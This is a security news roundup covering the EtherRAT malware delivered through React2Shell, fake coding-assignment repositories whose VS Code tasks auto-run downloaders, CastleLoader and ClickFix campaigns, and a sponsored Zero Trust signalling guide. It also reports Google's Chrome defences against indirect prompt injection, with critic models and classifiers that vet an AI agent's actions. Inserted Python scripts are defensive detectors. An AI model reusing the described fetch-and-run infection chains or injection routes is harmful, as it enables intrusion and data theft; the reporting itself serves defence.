2025-12-10 AI Startup News

North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware

Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical React2Shell flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT. “EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and downloads its own Node.js runtime from nodejs.org,” Sysdig said in a report published Monday. The cloud security firm said the activity exhibits significant overlap with a long-running campaign codenamed Contagious Interview, which has been observed leveraging the EtherHiding technique to distribute malware since February 2025. Contagious Interview is the name given to a series of attacks in which blockchain and Web3 developers, among others, are targeted through fake job interviews, coding assignments, and video assessments, leading to the deployment of malware.

These efforts typically begin with a ruse that lures victims via platforms like LinkedIn, Upwork, or Fiverr, where the threat actors pose as recruiters offering lucrative job opportunities. According to software supply chain security company Socket, it is one of the most prolific campaigns exploiting the npm ecosystem, highlighting the group’s ability to adapt to JavaScript and cryptocurrency-centric workflows. The attack chain commences with the exploitation of CVE-2025-55182 (CVSS score: 10.0), a maximum-severity security vulnerability in RSC, to execute a Base64-encoded shell command that downloads and runs a shell script responsible for deploying the main JavaScript implant. The shell script is retrieved using a curl command, with wget and python3 used as fallbacks.

It is also designed to prepare the environment by downloading Node.js v20.10.0 from nodejs.org, following which it writes to disk an encrypted blob and an obfuscated JavaScript dropper. Once all these steps are complete, it proceeds to delete the shell script to minimize the forensic trail and runs the dropper. The primary goal of the dropper is to decrypt the EtherRAT payload with a hard-coded key and spawn it using the downloaded Node.js binary. The malware is notable for using EtherHiding to fetch the C2 server URL from an Ethereum smart contract every five minutes, allowing the operators to update the URL easily, even if it’s taken down.

“What makes this implementation unique is its use of consensus voting across nine public Ethereum remote procedure call (RPC) endpoints,” Sysdig said. “EtherRAT queries all nine endpoints in parallel, collects responses, and selects the URL returned by the majority.” “This consensus mechanism protects against several attack scenarios: a single compromised RPC endpoint cannot redirect bots to a sinkhole, and researchers cannot poison C2 resolution by operating a rogue RPC node.” It’s worth noting that a similar implementation was previously observed in two npm packages named colortoolsv2 and mimelib2 that were found to deliver downloader malware to developer systems. Once EtherRAT establishes contact with the C2 server, it enters a polling loop that executes every 500 milliseconds, interpreting any response longer than 10 characters as JavaScript code to be run on the infected machine. Persistence is accomplished using five different methods:
- systemd user service
- XDG autostart entry
- cron jobs
- .bashrc injection
- profile injection
By using multiple mechanisms, the threat actors ensure the malware runs again after a system reboot and retain continued access to the infected systems.
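The five persistence locations above are all user-writable and all enumerable without root, so a quick triage script is worthwhile. The following is an added example, not Sysdig’s code: since the page does not give the unit, entry or file names EtherRAT writes, it applies a generic heuristic (an assumption) and flags any autostart entry that hands a script to an interpreter living in a user-writable path such as the home directory, /tmp, /var/tmp or /dev/shm, which is where a runtime fetched from nodejs.org at run time would have to sit.

```python
"""Hunt the five user-level Linux persistence mechanisms listed above.

Added example, not Sysdig's code. Heuristic (assumption): an entry is
suspicious when it runs an interpreter (node, python, sh, bash) from a
user-writable location. Expect some noise from legitimate user scripts;
this is a triage aid, not a signature.
"""
import re
import subprocess
import sys
from pathlib import Path

# Paths an unprivileged implant can drop a runtime into (assumption).
USER_WRITABLE = re.compile(r"(/tmp/|/var/tmp/|/dev/shm/|/home/[^/\s]+/|\$HOME/|~/)")
# Interpreters an implant would hand its script to.
INTERPRETER = re.compile(r"\b(node|nodejs|python3?|bash|sh)\b")


def is_suspicious(command: str) -> bool:
    command = command.strip()
    if not command or command.startswith("#"):
        return False
    return bool(INTERPRETER.search(command) and USER_WRITABLE.search(command))


def _ini_values(path: Path, key: str):
    """Yield the values of `key=` lines from a systemd unit or .desktop file."""
    for line in path.read_text(errors="replace").splitlines():
        if line.startswith(key + "="):
            yield line[len(key) + 1:]


def scan_home(home: Path, crontab_text: str = "") -> list:
    """Return (mechanism, location, command) for every suspicious entry."""
    findings = []
    units = home / ".config" / "systemd" / "user"
    if units.is_dir():                                    # 1. systemd user service
        for unit in sorted(units.glob("*.service")):
            for cmd in _ini_values(unit, "ExecStart"):
                if is_suspicious(cmd):
                    findings.append(("systemd-user", str(unit), cmd))
    autostart = home / ".config" / "autostart"
    if autostart.is_dir():                                # 2. XDG autostart entry
        for entry in sorted(autostart.glob("*.desktop")):
            for cmd in _ini_values(entry, "Exec"):
                if is_suspicious(cmd):
                    findings.append(("xdg-autostart", str(entry), cmd))
    for line in crontab_text.splitlines():                # 3. cron job
        if is_suspicious(line):
            findings.append(("cron", "crontab", line.strip()))
    for rc in (".bashrc", ".profile", ".bash_profile"):   # 4./5. .bashrc / profile injection
        path = home / rc
        if path.is_file():
            for line in path.read_text(errors="replace").splitlines():
                if is_suspicious(line):
                    findings.append(("shell-rc", str(path), line.strip()))
    return findings


def user_crontab() -> str:
    """`crontab -l` output, or "" when the user has no crontab or cron is absent."""
    try:
        return subprocess.run(["crontab", "-l"], capture_output=True,
                              text=True, check=False).stdout
    except FileNotFoundError:
        return ""


if __name__ == "__main__":
    home = Path(sys.argv[1]) if len(sys.argv) > 1 else Path.home()
    for mechanism, where, cmd in scan_home(home, user_crontab()):
        print(f"{mechanism:14} {where}: {cmd}")
```

Run it as the affected user (or point it at a mounted home directory from a forensic image) and review every hit by hand; a legitimate user cron job that calls a home-directory shell script will also match, which is the price of not knowing the implant’s file names in advance.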

Another sign that points to the malware’s sophistication is the self-update ability that overwrites itself with the new code received from the C2 server after sending its own source code to an API endpoint. It then launches a new process with the updated payload. What’s notable here is that the C2 returns a functionally identical but differently obfuscated version, thereby possibly allowing it to bypass static signature-based detection. In addition to the use of EtherHiding, the links to Contagious Interview stem from overlaps between the encrypted loader pattern used in EtherRAT and a known JavaScript information stealer and downloader named BeaverTail .

“EtherRAT represents a significant evolution in React2Shell exploitation, moving beyond opportunistic cryptomining and credential theft toward persistent, stealthy access designed for long-term operations,” Sysdig said. “Whether this represents North Korean actors pivoting to new exploitation vectors or sophisticated technique borrowing by another actor, the result is the same: defenders face a challenging new implant that resists traditional detection and takedown methods.”

Contagious Interview Shifts from npm to VS Code

The disclosure comes as OpenSourceMalware revealed details of a new Contagious Interview variant that urges victims to clone a malicious repository on GitHub, GitLab, or Bitbucket as part of a programming assignment and open the project in Microsoft Visual Studio Code (VS Code). This results in the execution of a task defined in the repository’s VS Code tasks.json file: the task is configured with runOptions.runOn set to “folderOpen”, so it auto-runs as soon as the folder is opened. The task is engineered to download a loader script using curl or wget, depending on the operating system of the compromised host.

In the case of Linux, the next stage is a shell script that downloads and runs another shell script named “vscode-bootstrap.sh,” which then fetches two more files, “package.json” and “env-setup.js,” the latter of which serves as a launchpad for BeaverTail and InvisibleFerret. OpenSourceMalware said it identified 13 different versions of this campaign spread across 27 different GitHub users and 11 different versions of BeaverTail. The earliest repository (“github[.]com/MentarisHub121/TokenPresaleApp”) dates back to April 22, 2025, and the most recent version (“github[.]com/eferos93/test4”) was created on December 1, 2025. “DPRK threat actors have flocked to Vercel, and are now using it almost exclusively,” the OpenSourceMalware team said.
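Before opening a repository received as a “coding assignment”, it is cheap to check whether it carries an auto-run task of the kind described above. The script below is an added example, not OpenSourceMalware’s tooling: it parses .vscode/tasks.json (which VS Code reads as JSON with comments, so comments and trailing commas are stripped first, on the assumption that “//” only appears at line starts or inside URLs) and reports every task whose runOptions.runOn is “folderOpen”, including per-OS command overrides, which is how one task can reach for curl on Linux and a different command on Windows. One caveat worth knowing: VS Code only runs such tasks once the folder is trusted, so the lure also has to talk the victim through the Workspace Trust prompt.

```python
"""Triage a cloned repository for VS Code tasks that run automatically on folder open.

Added example, not OpenSourceMalware's tooling. Looks for the pattern the
article describes: a task in .vscode/tasks.json with runOptions.runOn set to
"folderOpen", optionally with windows/linux/osx command overrides.
"""
import json
import re
import sys
from pathlib import Path


def loads_jsonc(text: str):
    """tasks.json is JSON-with-comments: drop block comments, whole-line // comments
    and trailing commas before handing it to json.loads (assumption: no '//' inside
    string values other than URLs, which are not at line start and so survive)."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return json.loads(text)


def _cmdline(spec: dict) -> str:
    """Flatten a task (or a per-OS override) into one command line for review."""
    cmd = spec.get("command", "")
    args = spec.get("args", [])
    parts = [cmd] + [a if isinstance(a, str) else json.dumps(a) for a in args]
    return " ".join(p for p in parts if p)


def folder_open_tasks(text: str) -> list:
    """Return (label, command line, {os: override command line}) for auto-run tasks."""
    doc = loads_jsonc(text)
    hits = []
    for task in doc.get("tasks", []):
        if not isinstance(task, dict):
            continue
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on != "folderOpen":
            continue
        overrides = {
            os_key: _cmdline(task[os_key])
            for os_key in ("windows", "linux", "osx")
            if isinstance(task.get(os_key), dict)
        }
        hits.append((task.get("label", "<unlabeled>"), _cmdline(task), overrides))
    return hits


def scan_repo(root: Path) -> list:
    """Inspect <root>/.vscode/tasks.json without opening the folder in an editor."""
    path = root / ".vscode" / "tasks.json"
    if not path.is_file():
        return []
    return folder_open_tasks(path.read_text(encoding="utf-8", errors="replace"))


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else Path(".")
    for label, cmd, per_os in scan_repo(target):
        print(f"[folderOpen] {label}: {cmd}")
        for os_key, override in per_os.items():
            print(f"    {os_key}: {override}")
```

Run it against the cloned directory from a terminal rather than from an editor, since the point is to look before anything executes; a task that pipes a download into a shell or into iex is the signal the article describes.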

“We don’t know why, but Contagious Interview has stopped using Fly.io, Platform.sh, Render and other hosting providers.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.

Four Threat Clusters Using CastleLoader as GrayBravo Expands Its Malware Service Infrastructure

Four distinct threat activity clusters have been observed leveraging a malware loader known as CastleLoader , strengthening the previous assessment that the tool is offered to other threat actors under a malware-as-a-service (MaaS) model. The threat actor behind CastleLoader has been assigned the name GrayBravo by Recorded Future’s Insikt Group, which was previously tracking it as TAG-150 . GrayBravo is “characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure,” the Mastercard-owned company said in an analysis published today. Some of the notable tools in the threat actor’s toolset include a remote access trojan called CastleRAT and a malware framework referred to as CastleBot, which comprises three components: a shellcode stager/downloader, a loader, and a core backdoor.

The CastleBot loader is responsible for injecting the core module, which is equipped to contact its command-and-control (C2) server to retrieve tasks that enable it to download and execute DLL, EXE, and PE (portable executable) payloads. Some of the malware families distributed via this framework are DeerStealer, RedLine Stealer, StealC Stealer, NetSupport RAT, SectopRAT, MonsterV2, WARMCOOKIE, and even other loaders like Hijack Loader. Recorded Future’s latest analysis has uncovered four clusters of activity, each operating with distinct tactics:
- Cluster 1 (TAG-160): targets the logistics sector using phishing and ClickFix techniques to distribute CastleLoader (active since at least March 2025)
- Cluster 2 (TAG-161): uses Booking.com-themed ClickFix campaigns to distribute CastleLoader and Matanbuchus 3.0 (active since at least June 2025)
- Cluster 3: uses infrastructure impersonating Booking.com in conjunction with ClickFix, and Steam Community pages as a dead-drop resolver, to deliver CastleRAT via CastleLoader (active since at least March 2025)
- Cluster 4: uses malvertising and fake software update lures masquerading as Zabbix and RVTools to distribute CastleLoader and NetSupport RAT (active since at least April 2025)
GrayBravo has been found to leverage a multi-tiered infrastructure to support its operations. This includes Tier 1 victim-facing C2 servers associated with malware families like CastleLoader, CastleRAT, SectopRAT, and WARMCOOKIE, as well as multiple VPS servers that likely operate as backups.

The attacks mounted by TAG-160 are also notable for using fraudulent or compromised accounts created on freight-matching platforms like DAT Freight & Analytics and Loadlink Technologies to enhance the credibility of its phishing campaigns. The activity, Recorded Future added, illustrates a deep understanding of industry operations, impersonating legitimate logistics firms, exploiting freight-matching platforms, and mirroring authentic communications to enhance its deception and impact. It’s been assessed with low confidence that the activity could be related to another unattributed cluster that targeted transportation and logistics companies in North America last year to distribute various malware families. “GrayBravo has significantly expanded its user base, evidenced by the growing number of threat actors and operational clusters leveraging its CastleLoader malware,” Recorded Future said.

“This trend highlights how technically advanced and adaptive tooling, particularly from a threat actor with GrayBravo’s reputation, can rapidly proliferate within the cybercriminal ecosystem once proven effective.”

Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading

The threat actor known as Storm-0249 is likely shifting from its role as an initial access broker to adopt a combination of more advanced tactics like domain spoofing, DLL side-loading, and fileless PowerShell execution to facilitate ransomware attacks. “These methods allow them to bypass defenses, infiltrate networks, maintain persistence, and operate undetected, raising serious concerns for security teams,” ReliaQuest said in a report shared with The Hacker News. Storm-0249 is the moniker assigned by Microsoft to an initial access broker that has sold footholds into organizations to other cybercrime groups, including ransomware and extortion actors like Storm-0501 . It was first highlighted by the tech giant in September 2024.

Then, earlier this year, Microsoft also revealed details of a phishing campaign mounted by the threat actor that used tax-related themes to target users in the U.S. ahead of the tax filing season and infect them with Latrodectus and the Brute Ratel C4 (BRc4) post-exploitation framework. The end goal of these infections is to obtain persistent access to various enterprise networks and monetize them by selling them to ransomware gangs, providing those gangs with a ready supply of targets and accelerating the pace of such attacks. The latest findings from ReliaQuest demonstrate a tactical shift, where Storm-0249 has resorted to using the infamous ClickFix social engineering tactic to trick prospective targets into running malicious commands via the Windows Run dialog under the pretext of resolving a technical issue.

In this case, the command copied and executed leverages the legitimate “curl.exe” to fetch a PowerShell script from a URL that mimics a Microsoft domain to give victims a false sense of trust (“sgcipl[.]com/us.microsoft.com/bdo/”) and execute it in a fileless manner via PowerShell. This, in turn, results in the execution of a malicious MSI package with SYSTEM privileges, which drops a trojanized DLL associated with SentinelOne’s endpoint security solution (“SentinelAgentCore.dll”) into the user’s AppData folder along with the legitimate “SentinelAgentWorker.exe” executable. In doing so, the idea is to sideload the rogue DLL when the “SentinelAgentWorker.exe” process is launched, thereby allowing the activity to stay undetected. The DLL then establishes encrypted communication with a command-and-control (C2) server.

Storm-0249 has also been observed making use of legitimate Windows administrative utilities like reg.exe and findstr.exe to extract unique system identifiers like MachineGuid to lay the groundwork for follow-on ransomware attacks. The use of living-off-the-land (LotL) tactics, coupled with the fact that these commands are run under the trusted “SentinelAgentWorker.exe” process, means the activity is unlikely to raise any red flags. The findings indicate a departure from mass phishing campaigns to precision attacks that weaponize the trust associated with signed processes for added stealth. “This isn’t just generic reconnaissance – it’s preparation for ransomware affiliates,” ReliaQuest said.

“Ransomware groups like LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems.” “By tying encryption keys to MachineGuid, attackers ensure that even if defenders capture the ransomware binary or attempt to reverse-engineer the encryption algorithm, they cannot decrypt files without the attacker-controlled key.”

How to Streamline Zero Trust Using the Shared Signals Framework

Zero Trust helps organizations shrink their attack surface and respond to threats faster, but many still struggle to implement it because their security tools don’t share signals reliably. 88% of organizations admit they’ve suffered significant challenges in trying to implement such approaches, according to Accenture . When products can’t communicate, real-time access decisions break down. The Shared Signals Framework (SSF) aims to fix this with a standardized way to exchange security events.

Yet adoption is uneven. For example, Kolide Device Trust doesn’t currently support SSF. Scott Bean, Senior IAM and Security Engineer at MongoDB, proposed a way to solve the problem, giving teams an easy and intuitive way to operationalize SSF across their environment. In this guide, we’ll share an overview of the workflow , plus step-by-step instructions for getting it up and running.

The problem: IAM tools don’t support SSF

A core requirement of Zero Trust is continuous, reliable signals about user and device posture. But many tools don’t support SSF or the Continuous Access Evaluation Profile (CAEP) built on it, making it hard to share or act on these signals. Teams often face three challenges:
- Tools lack native SSF support
- Signals require enrichment or correlation
- Managing SSF endpoints and token handling adds overhead
Without this interoperability, organizations struggle to apply consistent policies, and in cases like Kolide Device Trust, critical device events never reach systems like Okta.

The solution: an SSF transmitter that turns Kolide issues into CAEP events

Because SSF is built on plain HTTPS requests, the OpenID standard can be implemented with Tines’ HTTP Action.

Scott developed a new workflow integrating Kolide Device Trust with Tines , enabling it to send SSF signals to Okta. If a device is non-compliant, Kolide sends a message to the workflow via webhook. Tines enriches the signal, makes sure it can be linked to a user, builds a Security Event Token (SET), and then sends it to Okta. In this way, Tines acts as the connective tissue that makes SSF work across the distributed IT environment, even if individual tools don’t natively support the standard.

Tines can:
- Receive signals from Kolide (and tools like it) via webhook when a device becomes non-compliant
- Enrich and correlate those signals (e.g., map device to user)
- Generate and sign SETs that meet the SSF specification
- Deliver them to Okta (and other identity providers) to enforce Zero Trust
- Host the required SSF metadata endpoints using API path prefixes, giving consuming systems a standards-compliant place to fetch the public keys used to verify token signatures
All of which makes Zero Trust enforcement faster, more reliable, and much easier to operationalize. IT teams are empowered with continuous, real-time risk assessment of devices, faster response to threats, and more flexible policy orchestration. And end users get the benefit of automated remediation, which helps to optimize productivity and minimize IT intervention. If you want to go deeper into identity modernization, the Tines IAM guide explores how teams are unifying device trust, access decisions, and least-privilege enforcement with automation.

Scott’s workflow is one of several real-world patterns inside.

Workflow overview

Required tools:
- Tines: workflow orchestration and AI platform
- Kolide: device trust and posture monitoring
- Okta: identity platform receiving CAEP events

Required credentials:
- Tines API key, team-scoped with the Editor role
- Kolide API key, read-only
- Kolide webhook signing secret

Required resources:
- Okta domain, such as example.okta.com, example.oktapreview.com, or a branded domain

How it works: the workflow creates a proof-of-concept SSF transmitter that can be registered with Okta and sends device compliance change CAEP events (delivered as SETs) based on issues generated in Kolide. There are three elements:

1. Generate and store SET signing keys (SETs are signed JSON Web Tokens)
- Creates an RSA key pair and converts it to JWK format.
- Publishes the public key so SSF receivers can validate SET signatures.
- Stores the private JWK keyset as a Tines secret.

2. Expose the SSF transmitter API
SSF receivers like Okta need:
- a .well-known/sse-configuration endpoint describing the transmitter
- a JWKS endpoint exposing the public key used to verify SET signatures
A webhook trigger acts as the SSF API surface; one branch returns the .well-known configuration and the other returns the JWKS. Once this is live, teams can register a new SSF receiver in Okta under Security → Device Integrations → Receive shared signals, and create a new stream using the API’s URL and the new .well-known endpoint.

3. Create, sign and send SETs from Kolide events
- Receives Kolide issue events via webhook and validates them using the signing secret.
- Fetches device and user metadata from Kolide.
- Builds a SET for a Device Compliance Change CAEP event.
- Signs the SET with the stored private key using the JWT_SIGN formula.
- Sends the signed token to Okta’s security-events endpoint.
This delivers real-time device-compliance updates to Okta so access policies can respond immediately.

Configuring the workflow: a step-by-step guide

You can build and run this entire workflow using Tines Community Edition.

1. Log into Tines or create a new account.

2. Navigate to the pre-built workflow in the library and select import. This should take you straight to your new pre-built workflow.

3. Gather the required credentials: the Tines API key (team-scoped with the Editor role), the Kolide API key (read-only), and the Kolide webhook signing secret. These ensure authenticated calls to Kolide and secure webhook validation.

4. Collect your required resources. You’ll need an Okta tenant domain, such as example.oktapreview.com, example.okta.com, or your custom Okta brand domain. This domain is used when sending signed SETs to Okta’s security-events endpoint. Note: in the example provided, Scott set the transmitter up as push rather than poll, since tokens are sent as inbound webhooks arrive, so there is no stream state to store.

5. Generate your SET signing keys. Use the Generate JWK keyset action to create RSA keys, convert both public and private keys to JWK format (two event transforms), and store the resulting keyset using a Tines secret. This is required before Okta will accept and verify your SETs.

6. Publish the SSF transmitter API. The SSF API webhook contains two branches:
- .well-known endpoint. Trigger: well-known. Event transform: returns the SSF configuration declaring the transmitter’s capabilities.
- JWKS endpoint. Trigger: JWKs. Event transform: returns the public JWKs so Okta can verify signatures.
Once live, Okta can register this transmitter as a shared signals sender.

7. Connect Kolide and process device issues. The Kolide integration flow follows these steps:
- Webhook: Kolide webhook receives issue opened/resolved events.
- Get device details: fetches metadata for the device involved.
- Device has a user: branching logic to confirm a user is associated.
- Get user details: looks up user metadata for the CAEP payload.
Depending on whether the issue is new or resolved:
- Build SET: construct the CAEP device_compliance_change event.
- Sign SET: use the RSA private key stored earlier to produce an SSF-compliant SET.
- Send SET: send the final signed token to Okta’s security-events endpoint.
As soon as Okta receives and verifies the SET, the associated user’s risk level updates.

Bringing it all together

SSF exists to help security tools speak the same language, delivering continuous insight into risk and device posture. But when key tools don’t support the standard, gaps open up, and access policies lag behind real-world changes. Tines bridges these gaps by enabling new intelligent workflows.

They ensure that even tools that don’t support SSF can send information in the same standardized way. By using Tines to generate, sign, and deliver compliance signals in real time, you get the benefits of SSF even when the source tool wasn’t built for it. If you’d like to try this workflow yourself, you can spin it up in minutes with a free Tines account . And if you want to see how device posture fits into a broader identity strategy, this guide to modern IAM workflows offers practical patterns and real-world workflows like Scott’s you can start building on today.
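To make the “build SET, sign SET, send SET” steps concrete, here is what the token the workflow produces looks like on the wire, together with the checks a receiver performs on it. This is an added example, not Scott Bean’s Tines workflow or Okta’s code. The claim layout follows RFC 8417 (Security Event Token) and the OpenID CAEP device-compliance-change event; the issuer, audience, subject identifiers and the minimal .well-known subset are assumptions. The workflow signs with an RSA private key published as a JWK (RS256), which is what Okta verifies against; the example uses HS256 as a stand-in purely so it runs on the Python standard library, and the JOSE framing (header, claims, signature) is otherwise identical.

```python
"""Build, sign and verify a CAEP device-compliance-change SET (RFC 8417 + CAEP).

Added example, not the Tines workflow or Okta's code. HS256 stands in for the
workflow's RS256 signature so the example needs no third-party library.
"""
import base64
import hashlib
import hmac
import json
import time
import uuid

CAEP_DEVICE_COMPLIANCE = "https://schemas.openid.net/secevt/caep/event-type/device-compliance-change"
PUSH_DELIVERY = "https://schemas.openid.net/secevent/risc/delivery-method/push"


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def ssf_configuration(issuer: str) -> dict:
    """Minimal subset of the .well-known document a push-only transmitter advertises
    (assumption: jwks_uri path; the real document carries more fields)."""
    return {"issuer": issuer, "jwks_uri": issuer + "/jwks",
            "delivery_methods_supported": [PUSH_DELIVERY]}


def build_set(issuer: str, audience: str, user_email: str, device_id: str,
              compliant: bool, now=None) -> dict:
    """SET claims for a Kolide issue opened (compliant=False) or resolved (True)."""
    now = int(time.time()) if now is None else int(now)
    current, previous = (("compliant", "not-compliant") if compliant
                         else ("not-compliant", "compliant"))
    return {
        "iss": issuer, "aud": audience, "iat": now, "jti": uuid.uuid4().hex,
        "events": {CAEP_DEVICE_COMPLIANCE: {
            # SSF "complex" subject: the user and the device the event is about
            "subject": {"format": "complex",
                        "user": {"format": "email", "email": user_email},
                        "device": {"format": "opaque", "id": device_id}},
            "previous_status": previous, "current_status": current,
            "event_timestamp": now, "initiating_entity": "policy",
            "reason_admin": {"en": "Kolide issue " + ("resolved" if compliant else "opened")},
        }},
    }


def sign_set(claims: dict, key: bytes, kid: str) -> str:
    """Compact JWS with typ=secevent+jwt; kid lets the receiver pick the JWK."""
    header = {"alg": "HS256", "typ": "secevent+jwt", "kid": kid}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "." +
                     b64url(json.dumps(claims, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url(sig)


def verify_set(token: str, key: bytes, expected_aud: str) -> dict:
    """The receiver side: check typ/alg, signature, audience, and that an event is present."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    h, p, s = parts
    header = json.loads(b64url_decode(h))
    if header.get("typ") != "secevent+jwt" or header.get("alg") != "HS256":
        raise ValueError("unexpected typ/alg")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    claims = json.loads(b64url_decode(p))
    if claims.get("aud") != expected_aud:
        raise ValueError("audience mismatch")
    if not claims.get("events"):
        raise ValueError("SET carries no events")
    return claims
```

The signed string is what the Send SET step posts to the Okta tenant’s security-events endpoint with Content-Type application/secevent+jwt (check the exact path against Okta’s current documentation). Two of the receiver checks matter most in practice: the audience must be the receiver’s own identifier, so a token minted for one tenant cannot be replayed to another, and the algorithm must be pinned rather than taken from the header.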

This article is a contributed piece from one of our valued partners.

Google Adds Layered Defenses to Chrome to Block Indirect Prompt Injection Threats

Google on Monday announced a set of new security features in Chrome, following the company’s addition of agentic artificial intelligence (AI) capabilities to the web browser. To that end, the tech giant said it has implemented layered defenses to make it harder for bad actors to exploit indirect prompt injections that arise as a result of exposure to untrusted web content and inflict harm. Chief among the features is a User Alignment Critic, which uses a second model to independently evaluate the agent’s actions in a manner that’s isolated from malicious prompts. This approach complements Google’s existing techniques, like spotlighting , which instruct the model to stick to user and system instructions rather than abiding by what’s embedded in a web page.

“The User Alignment Critic runs after the planning is complete to double-check each proposed action,” Google said . “Its primary focus is task alignment: determining whether the proposed action serves the user’s stated goal. If the action is misaligned, the Alignment Critic will veto it.” The component is designed to view only metadata about the proposed action and is prevented from accessing any untrustworthy web content, thereby ensuring that it is not poisoned through malicious prompts that may be included in a website. With the User Alignment Critic, the idea is to provide safeguards against any malicious attempts to exfiltrate data or hijack the intended goals to carry out the attacker’s bidding.

“When an action is rejected, the Critic provides feedback to the planning model to re-formulate its plan, and the planner can return control to the user if there are repeated failures,” Nathan Parker from the Chrome security team said. Google is also enforcing what’s called Agent Origin Sets to ensure that the agent only has access to data from origins that are relevant to the task at hand or data sources the user has opted to share with the agent. This aims to address site isolation bypasses where a compromised agent can interact with arbitrary sites and exfiltrate data from logged-in sites. This is implemented by means of a gating function that determines which origins are related to the task and categorizes them into two sets:
- Read-only origins, from which Google’s Gemini AI model is permitted to consume content
- Read-writable origins, which the agent can type into or click on in addition to reading from
“This delineation enforces that only data from a limited set of origins is available to the agent, and this data can only be passed on to the writable origins,” Google explained.

“This bounds the threat vector of cross-origin data leaks.” Similar to the User Alignment Critic, the gating function is not exposed to untrusted web content. The planner is also required to obtain the gating function’s approval before adding new origins, although it can use context from the web pages a user has explicitly shared in a session. Another key pillar underpinning the new security architecture relates to transparency and user control, allowing the agent to create a work log for user observability and request their explicit approval before navigating to sensitive sites, such as banking and healthcare portals, permitting sign-ins via Google Password Manager, or completing web actions like purchases, payments, or sending messages. Lastly, the agent also checks each page for indirect prompt injections and operates alongside Safe Browsing and on-device scam detection to block potentially suspicious content.
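The origin-set design is easiest to reason about as a policy check applied to each action the planner proposes. The following is an added example, not Chrome’s code: it models the two sets the article describes, allows reads from either set, allows typing or clicking only on read-writable origins, and requires that any data carried into a write was read from an origin inside the sets, which is the “bounds the threat vector of cross-origin data leaks” property. The action schema, the taint field data_from, the decision strings and the sensitive-host list are assumptions made for the example; in Chrome the gating and confirmation decisions come from components that never see page content, which the example mirrors by taking only origins and action metadata as input.

```python
"""Agent Origin Sets as a per-action policy check (added example, not Chrome's code).

Decisions: 'allow', 'deny', 'gate' (planner must ask the gating function to admit a
new origin), 'confirm' (explicit user approval required). The check sees only
origins and action metadata, never page text, matching the article's design.
"""
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Assumption: hosts the user-approval rule treats as sensitive (banking, healthcare).
SENSITIVE_HOSTS = {"bank.example", "health.example"}


def origin_of(url: str) -> str:
    """scheme://host[:port], lower-cased: the unit the policy reasons about."""
    p = urlsplit(url)
    if not p.scheme or not p.netloc:
        raise ValueError(f"not an absolute URL: {url!r}")
    return f"{p.scheme}://{p.netloc}".lower()


@dataclass
class OriginSets:
    read_only: set = field(default_factory=set)
    read_write: set = field(default_factory=set)

    def readable(self, origin: str) -> bool:
        return origin in self.read_only or origin in self.read_write

    def writable(self, origin: str) -> bool:
        return origin in self.read_write


def evaluate(action: dict, sets: OriginSets) -> str:
    """action = {"kind": read|type|click|navigate, "url": ..., "data_from": [urls the
    typed/clicked payload was derived from]}  (schema is an assumption)."""
    kind = action["kind"]
    origin = origin_of(action["url"])
    tainted_by = {origin_of(u) for u in action.get("data_from", [])}

    if kind == "navigate":
        if urlsplit(action["url"]).hostname in SENSITIVE_HOSTS:
            return "confirm"                  # sensitive site: ask the user first
        return "allow" if sets.readable(origin) else "gate"

    if kind == "read":
        return "allow" if sets.readable(origin) else "gate"

    if kind in ("type", "click"):
        if not sets.writable(origin):
            return "deny"                     # read-only origins cannot be written to
        if not all(sets.readable(src) for src in tainted_by):
            return "deny"                     # payload carries data from outside the sets
        return "allow"

    raise ValueError(f"unknown action kind {kind!r}")
```

The deny on tainted writes is the interesting case: an injected instruction on a read-only page may persuade the planner to type that page’s contents into a form, but the form’s origin still has to be in the writable set, and the writable set is chosen by a component the page cannot talk to.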

“This prompt-injection classifier runs in parallel to the planning model’s inference, and will prevent actions from being taken based on content that the classifier determined has intentionally targeted the model to do something unaligned with the user’s goal,” Google said. To further incentivize research and poke holes in the system, the company said it will pay up to $20,000 for demonstrations that result in a breach of the security boundaries. These include indirect prompt injections that allow an attacker to:
- Carry out rogue actions without confirmation
- Exfiltrate sensitive data without an effective opportunity for user approval
- Bypass a mitigation that should have prevented the attack from succeeding in the first place
“By extending some core principles like origin-isolation and layered defenses, and introducing a trusted-model architecture, we’re building a secure foundation for Gemini’s agentic experiences in Chrome,” Google said. “We remain committed to continuous innovation and collaboration with the security community to ensure Chrome users can explore this new era of the web safely.” The announcement follows research from Gartner that called on enterprises to block the use of agentic AI browsers until the associated risks, such as indirect prompt injections, erroneous agent actions, and data loss, can be appropriately managed.

The research also warns of a possible scenario where employees “might be tempted to use AI browsers and automate certain tasks that are mandatory, repetitive, and less interesting.” This could cover cases where an individual dodges mandatory cybersecurity training by instructing the AI browser to complete it on their behalf. “Agentic browsers, or what many call AI browsers, have the potential to transform how users interact with websites and automate transactions while introducing critical cybersecurity risks,” the advisory firm said. “CISOs must block all AI browsers in the foreseeable future to minimize risk exposure.” The development comes as the U.K. National Cyber Security Centre (NCSC) said that large language models (LLMs) may suffer from a persistent class of vulnerability known as prompt injection and that the problem can never be resolved in its entirety.

